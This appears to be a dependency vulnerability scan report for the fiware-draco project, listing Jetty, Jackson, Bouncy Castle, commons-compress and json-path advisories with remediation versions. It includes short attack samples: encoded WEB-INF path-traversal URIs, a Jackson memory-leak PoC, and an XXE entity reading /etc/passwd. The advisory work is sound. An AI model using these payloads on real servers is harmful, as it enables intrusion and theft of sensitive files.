  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.

Overview

org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.

Affected versions of this package are vulnerable to Denial of Service (DoS) such that servlets with multipart support (e.g. annotated with @MultipartConfig) that call HttpServletRequest.getParameter() or HttpServletRequest.getParts() may cause OutOfMemoryError when the client sends a multipart request with a part that has a name but no filename and very large content.

Note: This happens even with the default settings of fileSizeThreshold=0, which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw OutOfMemoryError. However, the server may be able to recover after the OutOfMemoryError and continue its service -- although it may take some time.

Workaround

Users unable to upgrade can set the multipart parameter maxRequestSize, which must be set to a non-negative value.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-server to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.eclipse.jetty:jetty-webapp
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3.

Overview

org.eclipse.jetty:jetty-webapp is a maven plugin for Jetty web application support.

Affected versions of this package are vulnerable to Access Restriction Bypass. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. For example, a request to /%u002e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. Similarly, an encoded null character can prevent correct normalization so that /.%00/WEB-INF/web.xml can also retrieve the web.xml file.

Remediation

Upgrade org.eclipse.jetty:jetty-webapp to version 9.4.43, 10.0.6, 11.0.6 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.12.5, org.apache.nifi:nifi-standard-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.13.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-standard-utils@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.bazaarvoice.jolt:json-utils@0.1.1 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-standard-utils@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Information Exposure due to the JsonLocation._appendSourceDesc method. An attacker can access up to 500 bytes of unintended memory content by exploiting exception messages that incorrectly read from the beginning of a byte array instead of the logical payload start.

Workaround

This vulnerability can be mitigated by disabling exception message exposure to clients to avoid returning parsing exception messages in HTTP responses and/or disabling source inclusion in exceptions to prevent Jackson from embedding any source content in exception messages, avoiding leakage.

PoC


byte[] buffer = new byte[1000];
System.arraycopy("SECRET".getBytes(), 0, buffer, 0, 6);
System.arraycopy("{ \"bad\": }".getBytes(), 0, buffer, 700, 10);

JsonFactory factory = new JsonFactory();
JsonParser parser = factory.createParser(buffer, 700, 20);
parser.nextToken(); // throws exception

// Exception message will include "SECRET"

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.13.0-rc1 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Information Exposure due to missing validation for the X.500 name of any certificate, subject, or issuer. The presence of a wild card may lead to information disclosure. This could allow a malicious user to obtain unauthorized information via blind LDAP Injection, exploring the environment and enumerating data.

Note:

The exploit depends on the structure of the target LDAP directory as well as what kind of errors are exposed to the user.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.apache.commons:commons-compress
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-flowfile-packager@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.avro:avro@1.11.4.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-flowfile-packager@1.15.3 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-flowfile-packager@1.26.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.

Overview

org.apache.commons:commons-compress is an API for working with compression and archive formats.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to an OutOfMemoryError during the handling of a broken Pack200 file.

Remediation

Upgrade org.apache.commons:commons-compress to version 1.26.0 or higher.

References

medium severity

EPL-1.0 license

  • Module: junit:junit
  • Introduced through: org.apache.nifi:nifi-record-path@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 org.antlr:antlr-runtime@3.5.2 junit:junit@4.13.2

EPL-1.0 license

low severity

XML External Entity (XXE) Injection

  • Vulnerable module: org.eclipse.jetty:jetty-xml
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-xml@9.4.40.v20210413
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the XmlParser when parsing Jetty’s XML configuration files by importing a (remote) malicious WAR into Jetty’s server. Exploiting this vulnerability is possible when the WAR includes a malicious web.xml.

Note:

There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e., in order to exploit XmlParser, the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against a malicious web application, and potentially hostile web applications should only be run on isolated virtualization.

Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the Jetty XmlParser is equally vulnerable as direct usage of the JVM-supplied SAX parser. No CVE will be allocated to this advisory.

However, any direct usage of the XmlParser class by an application may be vulnerable. The impact would greatly depend on how the application uses XmlParser, but it could be a denial of service due to large entity expansion or possibly the revealing of local files if the XML results are accessible remotely.

Workaround

Users unable to upgrade to the fixed version should not use XmlParser to parse data from users.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade org.eclipse.jetty:jetty-xml to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.0 or higher.

References

low severity

Buffer Overflow

  • Vulnerable module: com.jayway.jsonpath:json-path
  • Introduced through: org.apache.nifi:nifi-record-serialization-services@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.jayway.jsonpath:json-path@2.6.0
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the deprecated Criteria.parse or Criteria.where methods. An attacker can disrupt the regular operation of the application by supplying a specially crafted input that triggers a stack overflow. Exploiting this vulnerability requires insecure configurations on the server side, for example - handling requests in a one single thread.

PoC

import com.jayway.jsonpath.Criteria;
